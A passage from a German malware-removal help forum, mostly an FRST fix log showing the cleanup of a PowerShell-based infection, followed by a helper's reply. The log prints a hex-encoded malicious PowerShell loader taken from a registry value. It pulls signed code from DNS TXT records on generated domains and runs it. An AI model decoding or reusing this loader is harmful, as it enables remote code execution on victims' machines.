020207D0D0A2020202020202020202020202020202020202020202020207D0D0A20202020202020202020202020202020202020207D0D0A20202020202020202020202020202020202020206361746368207B0D0A20202020202020202020202020202020202020207D0D0A202020202020202020202020202020207D0D0A2020202020202020202020207D0D0A20202020202020207D0D0A0D0A202020202020202069662028247570646174652E7465787429207B0D0A202020202020202020202020246A6F62203D2053746172742D4A6F62202D536372697074426C6F636B20285B736372697074626C6F636B5D3A3A43726561746528247570646174652E7465787429293B0D0A202020202020202020202020246A6F62207C20576169742D4A6F62202D54696D656F75742031343430303B0D0A202020202020202020202020246A6F62207C2053746F702D4A6F623B0D0A20202020202020207D0D0A202020207D0D0A202020206361746368207B0D0A202020207D0D0A2020202053746172742D536C656570202D5365636F6E64732033303B0D0A7D0D0A



========= Ende von CMD: =========

HKLM\Software\UnwinderoMHQ2fNRF => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{31B09827-39E3-4AA5-B493-4669AFB8E011}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{31B09827-39E3-4AA5-B493-4669AFB8E011}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChangeMQFVluCYC => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChangeMQFVluCYC" => erfolgreich entfernt

"C:\WINDOWS\System32\E7CD.tmp" Ordner verschieben:

C:\WINDOWS\System32\E7CD.tmp => erfolgreich verschoben

========= reg query "HKLM\Software\NahimicNuHseCC" /S =========


HKEY_LOCAL_MACHINE\Software\NahimicNuHseCC
    gzlbCQiYgEa    REG_BINARY    2738373332324641452D334642432D343130342D383331302D463942384132364531453645273B0D0A246D73203D205B494F2E4D656D6F727953747265616D5D3A3A6E657728293B0D0A0D0A66756E6374696F6E204765742D55706461746573207B0D0A20202020706172616D20280D0A202020202020202024686F73746E616D650D0A20202020290D0A20202020747279207B0D0A202020202020202024646E73203D205265736F6C76652D446E734E616D65202D4E616D652024686F73746E616D65202D54797065202754585427200D0A2020202020202020246D732E5365744C656E6774682830293B0D0A2020202020202020246D732E506F736974696F6E203D20303B0D0A2020202020202020666F726561636820282474787420696E2024646E7329207B0D0A202020202020202020202020747279207B0D0A2020202020202020202020202020202069662028247478742E54797065202D6E6520275458542729207B0D0A2020202020202020202020202020202020202020636F6E74696E75653B0D0A202020202020202020202020202020207D0D0A2020202020202020202020202020202024706B74203D205B737472696E675D3A3A4A6F696E2827272C20247478742E537472696E6773293B0D0A202020202020202020202020202020206966202824706B745B305D202D657120272E2729207B0D0A2020202020202020202020202020202020202020246470203D20285B747970655D2828285B72656765785D3A3A4D6174636865732827747265766E6F43272C272E272C275269676874546F4C6566742729207C20466F7245616368207B245F2E76616C75657D29202D6A6F696E2027272929292E4765744D6574686F647328295B3330365D2E496E766F6B6528246E756C6C2C2040282824706B742E537562737472696E672831292E5265706C61636528275F272C20272B27292929293B0D0A2020202020202020202020202020202020202020246D732E506F736974696F6E203D205B426974436F6E7665727465725D3A3A546F55496E743332282464702C2030293B0D0A2020202020202020202020202020202020202020246D732E5772697465282464702C20342C202464702E4C656E677468202D2034293B0D0A202020202020202020202020202020207D0D0A2020202020202020202020207D0D0A2020202020202020202020206361746368207B0D0A2020202020202020202020207D0D0A20202020202020207D0D0A0D0A202020202020202069662028246D732E4C656E677468202D67742031333629207B0D0A202020202020202020202020246D732E506F736974696F6E203D20303B0D0A20202020202020202020202024736967203D205B627974655B5D5D3A3A6E657728313238293B0D0A2020202020202020202020202474696D657374616D70203D205B627974655B5D5D3A3A6E65772838293B0D0A20202020202020202020202024627566666572203D205B627974655B5D5D3A3A6E657728246D732E4C656E677468202D20313336293B0D0A202020202020202020202020246D732E5265616428247369672C20302C2031323829207C204F75742D4E756C6C3B0D0A202020202020202020202020246D732E52656164282474696D657374616D702C20302C203829207C204F75742D4E756C6C3B0D0A202020202020202020202020246D732E5265616428246275666665722C20302C20246275666665722E4C656E67746829207C204F75742D4E756C6C3B0D0A202020202020202020202020247075626B6579203D205B53656375726974792E43727970746F6772617068792E52534143727970746F5365727669636550726F76696465725D3A3A6E657728293B0D0A09202020205B627974655B5D5D24627974617272203D20362C322C302C302C302C3136342C302C302C38322C38332C36352C34392C302C342C302C302C312C302C312C302C3137312C3133362C31392C3133392C3231352C33312C3136392C3234322C3133332C31312C3134362C3130352C37392C31332C3134302C38382C3131392C302C322C3234392C37392C31372C37372C3135322C3232382C3136322C33312C35362C3131372C38392C36382C3138322C3139342C3137302C3235302C31362C332C37382C3130342C39322C33372C33372C392C3235302C3136342C3234342C3139352C3131382C39322C3139302C35382C32302C33352C3133342C38332C31302C3232392C3131342C3232392C3133372C3234342C3137382C31302C33312C34362C38302C3232312C37332C3132392C3234302C3138332C392C3234352C3137372C3139362C37372C3134332C37312C3134322C36302C352C3131372C3234312C35342C322C3131362C32332C3232352C3134352C35332C34362C32312C3134322C3135382C3230362C3235302C3138312C3234312C382C3131302C3130312C38342C3231382C3231392C39392C3139362C3139352C3131322C37312C39332C35352C3131312C3231382C3230392C31322C3130312C3136352C34352C31332C33362C3131382C39372C3233322C3139332C3234352C3232312C3138302C3136390D0A202020202020202020202020247075626B65792E496D706F7274437370426C6F622824627974617272293B0D0A20202020202020202020202069662028247075626B65792E5665726966794461746128246275666665722C205B53656375726974792E43727970746F6772617068792E43727970746F436F6E6669675D3A3A4D61704E616D65546F4F4944282753484132353627292C20247369672929207B0D0A2020202020202020202020202020202072657475726E20407B0D0A202020202020202020202020202020202020202074696D657374616D70203D20285B53797374656D2E426974436F6E7665727465725D3A3A546F55496E743634282474696D657374616D702C203029293B0D0A2020202020202020202020202020202020202020746578742020202020203D20285B546578742E456E636F64696E675D3A3A555446382E476574537472696E67282462756666657229293B0D0A202020202020202020202020202020207D3B0D0A2020202020202020202020207D200D0A20202020202020207D0D0A202020207D0D0A202020206361746368207B0D0A202020207D0D0A2020202072657475726E20246E756C6C3B0D0A7D0D0A0D0A7768696C652028247472756529207B0D0A20202020747279207B0D0A202020202020202024757064617465203D20407B0D0A20202020202020202020202074696D657374616D70203D20303B0D0A202020202020202020202020746578742020202020203D2027273B2020202020202020202020200D0A20202020202020207D3B0D0A2020202020202020666F72656163682028246320696E2028402822636F6D222C202278797A22292929207B0D0A202020202020202020202020666F72656163682028246120696E2028402822776D61696C222C20226661697275222C2022626964656F222C202270726976617470726F7879222C202261686F7261766964656F22292929207B0D0A20202020202020202020202020202020666F72656163682028246220696E2028402822656E64706F696E74222C2022626C6F67222C202263686174222C202263646E222C20227363686E656C6C76706E22292929207B0D0A2020202020202020202020202020202020202020747279207B0D0A2020202020202020202020202020202020202020202020202468203D202224612D24622E2463223B0D0A2020202020202020202020202020202020202020202020202472203D204765742D557064617465732024680D0A20202020202020202020202020202020202020202020202069662028246E756C6C202D6E6520247229207B0D0A202020202020202020202020202020202020202020202020202020206966202824722E74696D657374616D70202D677420247570646174652E74696D657374616D7029207B0D0A202020202020202020202020202020202020202020202020202020202020202024757064617465203D2024723B0D0A202020202020202020202020202020202020202020202020202020207D0D0A2020202020202020202020202020202020202020202020207D0D0A20202020202020202020202020202020202020207D0D0A20202020202020202020202020202020202020206361746368207B0D0A20202020202020202020202020202020202020207D0D0A202020202020202020202020202020207D0D0A2020202020202020202020207D0D0A20202020202020207D0D0A0D0A202020202020202069662028247570646174652E7465787429207B0D0A202020202020202020202020246A6F62203D2053746172742D4A6F62202D536372697074426C6F636B20285B736372697074626C6F636B5D3A3A43726561746528247570646174652E7465787429293B0D0A202020202020202020202020246A6F62207C20576169742D4A6F62202D54696D656F75742031343430303B0D0A202020202020202020202020246A6F62207C2053746F702D4A6F623B0D0A20202020202020207D0D0A202020207D0D0A202020206361746368207B0D0A202020207D0D0A2020202053746172742D536C656570202D5365636F6E64732033303B0D0A7D0D0A



========= Ende von CMD: =========

HKLM\Software\NahimicNuHseCC => erfolgreich entfernt
"HKLM\Software\Policies\Microsoft\Windows\System\\EnableActivityFeed" => erfolgreich entfernt
"HKLM\Software\Policies\Microsoft\Windows\System\\PublishUserActivities" => erfolgreich entfernt
"HKLM\Software\Policies\Microsoft\Windows\System\\UploadUserActivities" => erfolgreich entfernt
"HKLM\Software\Policies\Microsoft\Windows\System\\AllowCrossDeviceClipboard" => erfolgreich entfernt
"HKU\S-1-5-21-3400922340-1585523840-3734490296-1001\Software\Microsoft\Windows\CurrentVersion\Run\\AMDNoiseSuppression" => erfolgreich entfernt
"HKU\S-1-5-21-3400922340-1585523840-3734490296-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\HideSCAMeetNow" => erfolgreich entfernt
"HKU\S-1-5-21-3400922340-1585523840-3734490296-1002\Software\Microsoft\Windows\CurrentVersion\Run\\MicrosoftEdgeAutoLaunch_4F3ACAD5137A03F38014355EA53C9FBD" => erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{C885AA15-1764-4293-B82A-0586ADD46B35} => erfolgreich entfernt

"C:\WINDOWS\system32\GroupPolicy\Machine" Ordner verschieben:

C:\WINDOWS\system32\GroupPolicy\Machine => erfolgreich verschoben
C:\WINDOWS\system32\GroupPolicy\GPT.ini => erfolgreich verschoben
C:\ProgramData\NTUSER.pol => erfolgreich verschoben
HKLM\SOFTWARE\Policies\Microsoft\Edge => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CCDFC0B8-01A3-4E74-A820-4F13F51D269E}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CCDFC0B8-01A3-4E74-A820-4F13F51D269E}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7E359839-10FF-4083-92B7-07B6F17CF925}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7E359839-10FF-4083-92B7-07B6F17CF925}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_AC => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Reboot_AC" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{05FACDF0-6FE2-48B0-BCDE-87CD432CEA4E}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{05FACDF0-6FE2-48B0-BCDE-87CD432CEA4E}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E0F10DCF-44AD-40E8-9370-FB5DA59F93FB}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E0F10DCF-44AD-40E8-9370-FB5DA59F93FB}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{002C80C5-1CE2-4C73-8E35-D7B5AE35E00A}" => erfolgreich entfernt
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{002C80C5-1CE2-4C73-8E35-D7B5AE35E00A}" => erfolgreich entfernt
C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3400922340-1585523840-3734490296-1002 => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\OneDrive Standalone Update Task-S-1-5-21-3400922340-1585523840-3734490296-1002" => erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\HWiNFO_180 => erfolgreich entfernt
HWiNFO_180 => Dienst erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\npcap => erfolgreich entfernt
npcap => Dienst erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\npcap_wifi => erfolgreich entfernt
npcap_wifi => Dienst erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\WinSetupMon => erfolgreich entfernt
WinSetupMon => Dienst erfolgreich entfernt
"C:\Users\ProgramData\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\magnolia@12.34.xpi" => nicht gefunden
"C:\Users\Default\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\magnolia@12.34.xpi" => nicht gefunden
C:\Users\doppo\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\magnolia@12.34.xpi => erfolgreich verschoben
"C:\Users\kids\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\magnolia@12.34.xpi" => nicht gefunden
"C:\Users\kids.DESKTOP-06IS096\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\magnolia@12.34.xpi" => nicht gefunden
"C:\Users\Public\AppData\Roaming\Mozilla\Firefox\Profiles\a70tufy1.default-release\Extensions\magnolia@12.34.xpi" => nicht gefunden

========= cscript /nologo %systemroot%\System32\slmgr.vbs /dlv =========

Softwarelizenzierungsdienst-Version: 10.0.22621.2428

Name: Windows(R), Professional edition
Beschreibung: Windows(R) Operating System, VOLUME_MAK channel
Aktivierungs-ID: 49cd895b-53b2-4dc4-a5f7-b18aa019ad37
Anwendungs-ID: 55c92734-d682-4d71-983e-d6ec3f16059f
Erweiterte PID: 03612-03312-009-000000-03-1031-22621.0000-0422023
Product Key-Kanal: Volume:MAK
Installations-ID: 645632343386005512764850763252056049700921713167616877413286966
Lizenz-URL verwenden: https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
URL fr die šberprfung: https://validation-v2.sls.microsoft.com/SLWGA/slwga.asmx
Teil-Product Key: RM49M
Lizenzstatus: Lizenziert
Verbleibende Windows Rearm-Anzahl: 1001
Verbleibende SKU Rearm-Anzahl: 1001
Vertrauenswrdige Zeit: 24.10.2023 15:04:09




========= Ende von CMD: =========


========= netsh winsock reset =========


Der Winsock-Katalog wurde zurckgesetzt.
Sie mssen den Computer neu starten, um den Vorgang abzuschlieáen.



========= Ende von CMD: =========


========= netsh int ip reset =========

Depotweiterleitung wird zurckgesetzt... OK
Depot wird zurckgesetzt... OK
Steuerungsprotokoll wird zurckgesetzt... OK
Echosequenzanforderung wird zurckgesetzt... OK
Global wird zurckgesetzt... OK
Schnittstelle wird zurckgesetzt... OK
Anycastadresse wird zurckgesetzt... OK
Multicastadresse wird zurckgesetzt... OK
Unicastadresse wird zurckgesetzt... OK
Nachbar wird zurckgesetzt... OK
Pfad wird zurckgesetzt... OK
Potentiell wird zurckgesetzt... OK
Pr„fixrichtlinie wird zurckgesetzt... OK
Proxynachbar wird zurckgesetzt... OK
Route wird zurckgesetzt... OK
Standordpr„fix wird zurckgesetzt... OK
Unterschnittstelle wird zurckgesetzt... OK
Reaktivierungsmuster wird zurckgesetzt... OK
Nachbar aufl”sen wird zurckgesetzt... OK
 wird zurckgesetzt... OK
 wird zurckgesetzt... OK
 wird zurckgesetzt... OK
 wird zurckgesetzt... OK
 wird zurckgesetzt... Fehler
Zugriff verweigert

 wird zurckgesetzt... OK
 wird zurckgesetzt... OK
 wird zurckgesetzt... OK
 wird zurckgesetzt... OK
 wird zurckgesetzt... OK
 wird zurckgesetzt... OK
 wird zurckgesetzt... OK
 wird zurckgesetzt... OK
Starten Sie den Computer neu, um die Aktion abzuschlieáen.



========= Ende von CMD: =========


========= ipconfig /release =========


Windows-IP-Konfiguration

Es kann kein Vorgang auf Ethernet 2 ausgefhrt werden, solange dessen Medium nicht
verbunden ist.
Es kann kein Vorgang auf Bluetooth-Netzwerkverbindung ausgefhrt werden, solange dessen Medium nicht
verbunden ist.


========= Ende von CMD: =========


========= ipconfig /renew =========


Windows-IP-Konfiguration

Es kann kein Vorgang auf Ethernet 2 ausgefhrt werden, solange dessen Medium nicht
verbunden ist.
Es kann kein Vorgang auf Bluetooth-Netzwerkverbindung ausgefhrt werden, solange dessen Medium nicht
verbunden ist.


========= Ende von CMD: =========


========= ipconfig /registerdns =========


Windows-IP-Konfiguration

Die Registrierung der DNS-Ressourceneintr„ge fr alle Adapter dieses Computer wurde initialisiert. Fehler werden in der Ereignisanzeige in 15 Minuten aufgefhrt.


========= Ende von CMD: =========


========= netsh advfirewall reset =========

OK.



========= Ende von CMD: =========


========= netsh advfirewall set allprofiles state ON =========

OK.



========= Ende von CMD: =========


========= netsh winhttp reset proxy =========


Aktuelle WinHTTP-Proxyeinstellungen:

    DirectAccess (kein Proxyserver).



========= Ende von CMD: =========


========= Bitsadmin /Reset /Allusers =========


BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.

{BA20ED90-16CF-45C9-A36F-1EC1EA381376} canceled.
{AC6B056C-10D0-40CC-8213-5F51D7E8F868} canceled.
2 out of 2 jobs canceled.


========= Ende von CMD: =========


========= Winmgmt /salvagerepository =========

Das WMI-Repository ist konsistent.


========= Ende von CMD: =========


========= Winmgmt /resetrepository =========

Das WMI-Repository wurde zurckgesetzt.


========= Ende von CMD: =========


========= winmgmt /resyncperf =========

0

========= Ende von CMD: =========


========= "%WINDIR%\SYSTEM32\lodctr.exe" /R =========


Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.

========= Ende von CMD: =========


========= "%WINDIR%\SysWOW64\lodctr.exe" /R =========


Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.

========= Ende von CMD: =========


========= "%WINDIR%\SYSTEM32\lodctr.exe" /R =========


Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.

========= Ende von CMD: =========


========= "%WINDIR%\SysWOW64\lodctr.exe" /R =========


Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.

========= Ende von CMD: =========


========= sfc /scannow =========



Systemsuche wird gestartet. Dieser Vorgang kann einige Zeit dauern.



Überprüfungsphase der Systemsuche wird gestartet.


Überprüfung 0 % abgeschlossen.
Überprüfung 1 % abgeschlossen.
Überprüfung 1 % abgeschlossen.
Überprüfung 2 % abgeschlossen.
Überprüfung 2 % abgeschlossen.
Überprüfung 3 % abgeschlossen.
Überprüfung 3 % abgeschlossen.
Überprüfung 4 % abgeschlossen.
Überprüfung 4 % abgeschlossen.
Überprüfung 5 % abgeschlossen.
Überprüfung 5 % abgeschlossen.
Überprüfung 6 % abgeschlossen.
Überprüfung 6 % abgeschlossen.
Überprüfung 7 % abgeschlossen.
Überprüfung 7 % abgeschlossen.
Überprüfung 8 % abgeschlossen.
Überprüfung 8 % abgeschlossen.
Überprüfung 9 % abgeschlossen.
Überprüfung 9 % abgeschlossen.
Überprüfung 10 % abgeschlossen.
Überprüfung 10 % abgeschlossen.
Überprüfung 11 % abgeschlossen.
Überprüfung 11 % abgeschlossen.
Überprüfung 12 % abgeschlossen.
Überprüfung 12 % abgeschlossen.
Überprüfung 13 % abgeschlossen.
Überprüfung 13 % abgeschlossen.
Überprüfung 14 % abgeschlossen.
Überprüfung 14 % abgeschlossen.
Überprüfung 15 % abgeschlossen.
Überprüfung 15 % abgeschlossen.
Überprüfung 16 % abgeschlossen.
Überprüfung 16 % abgeschlossen.
Überprüfung 17 % abgeschlossen.
Überprüfung 17 % abgeschlossen.
Überprüfung 18 % abgeschlossen.
Überprüfung 18 % abgeschlossen.
Überprüfung 19 % abgeschlossen.
Überprüfung 19 % abgeschlossen.
Überprüfung 20 % abgeschlossen.
Überprüfung 20 % abgeschlossen.
Überprüfung 21 % abgeschlossen.
Überprüfung 21 % abgeschlossen.
Überprüfung 22 % abgeschlossen.
Überprüfung 22 % abgeschlossen.
Überprüfung 23 % abgeschlossen.
Überprüfung 23 % abgeschlossen.
Überprüfung 24 % abgeschlossen.
Überprüfung 24 % abgeschlossen.
Überprüfung 25 % abgeschlossen.
Überprüfung 25 % abgeschlossen.
Überprüfung 26 % abgeschlossen.
Überprüfung 26 % abgeschlossen.
Überprüfung 27 % abgeschlossen.
Überprüfung 28 % abgeschlossen.
Überprüfung 28 % abgeschlossen.
Überprüfung 29 % abgeschlossen.
Überprüfung 29 % abgeschlossen.
Überprüfung 30 % abgeschlossen.
Überprüfung 30 % abgeschlossen.
Überprüfung 31 % abgeschlossen.
Überprüfung 31 % abgeschlossen.
Überprüfung 32 % abgeschlossen.
Überprüfung 32 % abgeschlossen.
Überprüfung 33 % abgeschlossen.
Überprüfung 33 % abgeschlossen.
Überprüfung 34 % abgeschlossen.
Überprüfung 34 % abgeschlossen.
Überprüfung 35 % abgeschlossen.
Überprüfung 35 % abgeschlossen.
Überprüfung 36 % abgeschlossen.
Überprüfung 36 % abgeschlossen.
Überprüfung 37 % abgeschlossen.
Überprüfung 37 % abgeschlossen.
Überprüfung 38 % abgeschlossen.
Überprüfung 38 % abgeschlossen.
Überprüfung 39 % abgeschlossen.
Überprüfung 39 % abgeschlossen.
Überprüfung 40 % abgeschlossen.
Überprüfung 40 % abgeschlossen.
Überprüfung 41 % abgeschlossen.
Überprüfung 41 % abgeschlossen.
Überprüfung 42 % abgeschlossen.
Überprüfung 42 % abgeschlossen.
Überprüfung 43 % abgeschlossen.
Überprüfung 43 % abgeschlossen.
Überprüfung 44 % abgeschlossen.
Überprüfung 44 % abgeschlossen.
Überprüfung 45 % abgeschlossen.
Überprüfung 45 % abgeschlossen.
Überprüfung 46 % abgeschlossen.
Überprüfung 46 % abgeschlossen.
Überprüfung 47 % abgeschlossen.
Überprüfung 47 % abgeschlossen.
Überprüfung 48 % abgeschlossen.
Überprüfung 48 % abgeschlossen.
Überprüfung 49 % abgeschlossen.
Überprüfung 49 % abgeschlossen.
Überprüfung 50 % abgeschlossen.
Überprüfung 50 % abgeschlossen.
Überprüfung 51 % abgeschlossen.
Überprüfung 51 % abgeschlossen.
Überprüfung 52 % abgeschlossen.
Überprüfung 52 % abgeschlossen.
Überprüfung 53 % abgeschlossen.
Überprüfung 53 % abgeschlossen.
Überprüfung 54 % abgeschlossen.
Überprüfung 55 % abgeschlossen.
Überprüfung 55 % abgeschlossen.
Überprüfung 56 % abgeschlossen.
Überprüfung 56 % abgeschlossen.
Überprüfung 57 % abgeschlossen.
Überprüfung 57 % abgeschlossen.
Überprüfung 58 % abgeschlossen.
Überprüfung 58 % abgeschlossen.
Überprüfung 59 % abgeschlossen.
Überprüfung 59 % abgeschlossen.
Überprüfung 60 % abgeschlossen.
Überprüfung 60 % abgeschlossen.
Überprüfung 61 % abgeschlossen.
Überprüfung 61 % abgeschlossen.
Überprüfung 62 % abgeschlossen.
Überprüfung 62 % abgeschlossen.
Überprüfung 63 % abgeschlossen.
Überprüfung 63 % abgeschlossen.
Überprüfung 64 % abgeschlossen.
Überprüfung 64 % abgeschlossen.
Überprüfung 65 % abgeschlossen.
Überprüfung 65 % abgeschlossen.
Überprüfung 66 % abgeschlossen.
Überprüfung 66 % abgeschlossen.
Überprüfung 67 % abgeschlossen.
Überprüfung 67 % abgeschlossen.
Überprüfung 68 % abgeschlossen.
Überprüfung 68 % abgeschlossen.
Überprüfung 69 % abgeschlossen.
Überprüfung 69 % abgeschlossen.
Überprüfung 70 % abgeschlossen.
Überprüfung 70 % abgeschlossen.
Überprüfung 71 % abgeschlossen.
Überprüfung 71 % abgeschlossen.
Überprüfung 72 % abgeschlossen.
Überprüfung 72 % abgeschlossen.
Überprüfung 73 % abgeschlossen.
Überprüfung 73 % abgeschlossen.
Überprüfung 74 % abgeschlossen.
Überprüfung 74 % abgeschlossen.
Überprüfung 75 % abgeschlossen.
Überprüfung 75 % abgeschlossen.
Überprüfung 76 % abgeschlossen.
Überprüfung 76 % abgeschlossen.
Überprüfung 77 % abgeschlossen.
Überprüfung 77 % abgeschlossen.
Überprüfung 78 % abgeschlossen.
Überprüfung 78 % abgeschlossen.
Überprüfung 79 % abgeschlossen.
Überprüfung 79 % abgeschlossen.
Überprüfung 80 % abgeschlossen.
Überprüfung 80 % abgeschlossen.
Überprüfung 81 % abgeschlossen.
Überprüfung 82 % abgeschlossen.
Überprüfung 82 % abgeschlossen.
Überprüfung 83 % abgeschlossen.
Überprüfung 83 % abgeschlossen.
Überprüfung 84 % abgeschlossen.
Überprüfung 84 % abgeschlossen.
Überprüfung 85 % abgeschlossen.
Überprüfung 85 % abgeschlossen.
Überprüfung 86 % abgeschlossen.
Überprüfung 86 % abgeschlossen.
Überprüfung 87 % abgeschlossen.
Überprüfung 87 % abgeschlossen.
Überprüfung 88 % abgeschlossen.
Überprüfung 88 % abgeschlossen.
Überprüfung 89 % abgeschlossen.
Überprüfung 89 % abgeschlossen.
Überprüfung 90 % abgeschlossen.
Überprüfung 90 % abgeschlossen.
Überprüfung 91 % abgeschlossen.
Überprüfung 91 % abgeschlossen.
Überprüfung 92 % abgeschlossen.
Überprüfung 92 % abgeschlossen.
Überprüfung 93 % abgeschlossen.
Überprüfung 93 % abgeschlossen.
Überprüfung 94 % abgeschlossen.
Überprüfung 94 % abgeschlossen.
Überprüfung 95 % abgeschlossen.
Überprüfung 95 % abgeschlossen.
Überprüfung 96 % abgeschlossen.
Überprüfung 96 % abgeschlossen.
Überprüfung 97 % abgeschlossen.
Überprüfung 97 % abgeschlossen.
Überprüfung 98 % abgeschlossen.
Überprüfung 98 % abgeschlossen.
Überprüfung 99 % abgeschlossen.
Überprüfung 99 % abgeschlossen.
Überprüfung 100 % abgeschlossen.


Der Windows-Ressourcenschutz hat keine Integritätsverletzungen gefunden.



========= Ende von CMD: =========

C:\Windows\System32\Drivers\etc\hosts => erfolgreich verschoben
Hosts erfolgreich wiederhergestellt.

========= RemoveProxy: =========

"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
"HKU\S-1-5-21-3400922340-1585523840-3734490296-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\S-1-5-21-3400922340-1585523840-3734490296-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
"HKU\S-1-5-21-3400922340-1585523840-3734490296-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\S-1-5-21-3400922340-1585523840-3734490296-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt


========= Ende von RemoveProxy: =========


=========== EmptyTemp: ==========

FlushDNS => abgeschlossen
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 9723144 B
Java, Discord, Steam htmlcache, WinHttpAutoProxySvc/winhttp *.cache => 1246330483 B
Windows/system/drivers => 10572440 B
Edge => 0 B
Firefox => 4197207559 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 662290 B
NetworkService => 1121226 B
doppo => 2745370254 B
kids.DESKTOP-06IS096 => 2784847032 B

RecycleBin => 0 B
EmptyTemp: => 10.2 GB temporäre Dateien entfernt.

================================


Das System musste neu gestartet werden.

==== Ende von Fixlog 15:11:37 ====
__________________
Alt 24.10.2023, 16:17   #4
M-K-D-B
/// TB-Ausbilder
 
drei Unbekannte Powershell Prozesse - Standard

drei Unbekannte Powershell Prozesse


Zitat:
Zitat von Pun99 Beitrag anzeigen
vielen Dank für deine Zeit.
Die Reparatur konnte durchgeführt werden.
Zumindest im Moment schaut es nach einem Erfolg aus.
Ja, die Logdatei sieht schon mal vielversprechend aus.



Zitat:
Zitat von Pun99 Beitrag anzeigen
Die Links zu VirusTotal sagen mir, dass der Defender die Schädlinge nicht kennt.
Gilt die Empfehlung für den Defender denn noch, oder sollte ich andere Software zum Schutz benutzen?
Die Empfehlung gilt noch... dir muss klar sein, dass kein Tool 100%-igen Schutz bietet.

Ich selbst verwende den Windows Defender ebenfalls, dazu noch Malwarebytes' Anti-Malware (free version).



Zitat:
Zitat von Pun99 Beitrag anzeigen
Interessant finde ich auch wie du zu dieser Lösung gekommen bist, gibt es da Texte dazu um sowas selbst bewerkstelligen zu können?
